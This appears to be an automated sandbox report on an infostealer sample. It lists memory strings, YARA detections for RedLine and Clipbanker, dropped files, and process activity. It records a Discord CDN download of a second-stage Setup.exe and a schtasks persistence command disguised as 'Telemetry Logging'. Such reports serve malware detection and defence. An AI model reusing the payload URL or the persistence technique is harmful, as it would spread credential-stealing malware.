          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
          Source: file.exe, 00000000.00000002.415504555.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
          Source: file.exe, 00000000.00000002.415504555.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
          Source: file.exe, 00000000.00000002.415504555.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
          Source: file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exeString found in binary or memory: https://api.ip.sb/ip
          Source: file.exe, 00000000.00000002.416056486.0000000003423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416056486.0000000003423000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1013922792204415100/1029136565533933638/Setup.exe
          Source: file.exe, 00000000.00000002.416056486.0000000003423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com4
          Source: file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: file.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: file.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: file.exe, 00000000.00000002.416227735.000000000344F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416247086.0000000003453000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmp, Setup.exe.0.dr, oobeldr.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
          Source: file.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/1013922792204415100/1029136565533933638/Setup.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49707 version: TLS 1.2

          System Summary

          barindex
          Source: file.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0.0.file.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 1.2.Setup.exe.13e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
          Source: 6.2.oobeldr.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
          Source: 00000006.00000002.575451652.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
          Source: 00000001.00000003.426846132.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
          Source: 00000001.00000002.440712189.00000000013E1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
          Source: 00000006.00000003.468605654.0000000001270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: Setup.exe.0.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: oobeldr.exe.1.drStatic PE information: section name:
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0.0.file.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 1.2.Setup.exe.13e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
          Source: 6.2.oobeldr.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
          Source: 00000006.00000002.575451652.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
          Source: 00000001.00000003.426846132.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
          Source: 00000001.00000002.440712189.00000000013E1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
          Source: 00000006.00000003.468605654.0000000001270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_018B08F80_2_018B08F8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_018BF6D00_2_018BF6D0
          Source: file.exe, 00000000.00000000.309024807.0000000000E44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRelate.exe4 vs file.exe
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenameRelate.exe4 vs file.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Setup.exe F7BED46FE83995D9A4EFF5E9BF41C26E0721BCCED7EF05A47284BB59F44B274E
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe F7BED46FE83995D9A4EFF5E9BF41C26E0721BCCED7EF05A47284BB59F44B274E
          Source: Setup.exe.0.drStatic PE information: Section: ZLIB complexity 0.9996558671236873
          Source: oobeldr.exe.1.drStatic PE information: Section: ZLIB complexity 0.9996558671236873
          Source: file.exeReversingLabs: Detection: 75%
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\Setup.exe "C:\Users\user\AppData\Local\Temp\Setup.exe"
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\Setup.exe "C:\Users\user\AppData\Local\Temp\Setup.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
